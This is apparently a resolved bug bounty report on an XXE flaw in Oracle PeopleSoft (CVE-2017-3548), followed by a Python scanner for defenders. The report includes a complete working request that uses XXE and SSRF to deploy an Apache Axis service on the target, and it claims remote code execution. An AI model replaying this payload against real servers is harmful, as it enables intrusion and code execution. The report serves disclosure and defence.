XXE with RCE potential on the https://█████████ (CVE-2017-3548)
High
Vulnerability Details
## Description
Hello. I was able to identify XXE on the https://███████
It is a CVE in Oracle PeopleSoft (CVE-2017-3548).
## POC
I determined that the instance is available on localhost port 80, so it's possible to access `/pspc/services/AdminService` via XXE:
```
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: ████████
Content-Type: application/xml
Content-Length: 608
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://localhost:80/pspc/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22h1testservice%22+provider%3D%22java%3ARPC%22%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22org.apache.pluto.portalImpl.Deploy%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3C%2Fns1%3Adeployment">
```
where `h1testservice` is the test service name I'm trying to create.
The result:
```
https://██████████/pspc/services/h1testservice
```
█████
I created a new service on the server.
It's possible to go further like the other researcher did in #227880, but I don't think that dropping a shell is necessary (since it's already proved that we can create our own Apache Axis service).
## Suggested fix
Patch the Oracle PeopleSoft instance.
## Impact
Remote code execution, internal network access.
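As an added defender-side example (not part of the report), a small Python check that flags XML request bodies whose DOCTYPE names an external identifier, the mechanism the request above relies on, and rates those aimed at localhost and the `AdminService` path highest. The internal-host and sensitive-path lists are assumptions to tune per site, and the sample bodies are constructed.

```python
import re
from urllib.parse import urlsplit

# A DOCTYPE that names an external identifier: SYSTEM "uri" or PUBLIC "pubid" "uri".
# Any such DOCTYPE in an inbound request body is worth flagging: the parser fetches the URI.
_DOCTYPE_RE = re.compile(
    r'<!DOCTYPE\s+[^\s>]+\s+(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)")',
    re.IGNORECASE,
)
# Hosts that should never appear as an external identifier in a request from outside.
_INTERNAL_HOSTS = ("localhost", "0.0.0.0", "::1")
_INTERNAL_PREFIXES = ("127.", "10.", "192.168.", "169.254.")
# Internal endpoint named in the report (assumption: extend with site-specific admin paths).
_SENSITIVE_PATHS = ("/pspc/services/AdminService",)


def classify_xml_body(body: str) -> dict:
    """Return a finding for an XML request body, or {} if it has no external DOCTYPE."""
    m = _DOCTYPE_RE.search(body)
    if not m:
        return {}
    uri = m.group(1) or m.group(2) or ""
    parts = urlsplit(uri)
    host = (parts.hostname or "").lower()
    internal = host in _INTERNAL_HOSTS or host.startswith(_INTERNAL_PREFIXES)
    sensitive = any(parts.path.startswith(p) for p in _SENSITIVE_PATHS)
    if internal and sensitive:
        severity = "high"     # SSRF into an admin endpoint, the pattern in the report
    elif internal:
        severity = "medium"   # SSRF into the host itself
    else:
        severity = "low"      # external DTD fetch: still XXE, block it as well
    return {"uri": uri, "host": host, "path": parts.path, "severity": severity}


def scan_requests(requests: list[tuple[str, str]]) -> list[dict]:
    """requests: (request_id, body) pairs; returns the findings with ids attached."""
    out = []
    for rid, body in requests:
        finding = classify_xml_body(body)
        if finding:
            out.append({"id": rid, **finding})
    return out


# Constructed sample bodies; r3 mirrors the shape of the report's request (query omitted).
SAMPLE_REQUESTS = [
    ("r1", '<?xml version="1.0"?><order><id>42</id></order>'),
    ("r2", '<!DOCTYPE a SYSTEM "http://dtd.example/a.dtd"><a/>'),
    ("r3", '<!DOCTYPE a PUBLIC "-//B/A/EN" "http://localhost:80/pspc/services/AdminService"><a/>'),
]
```

Running `scan_requests(SAMPLE_REQUESTS)` reports r2 as low and r3 as high; r1 produces no finding.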
Report Stats
- Report ID: 710654
- State: Closed
- Substate: resolved
- Upvotes: 7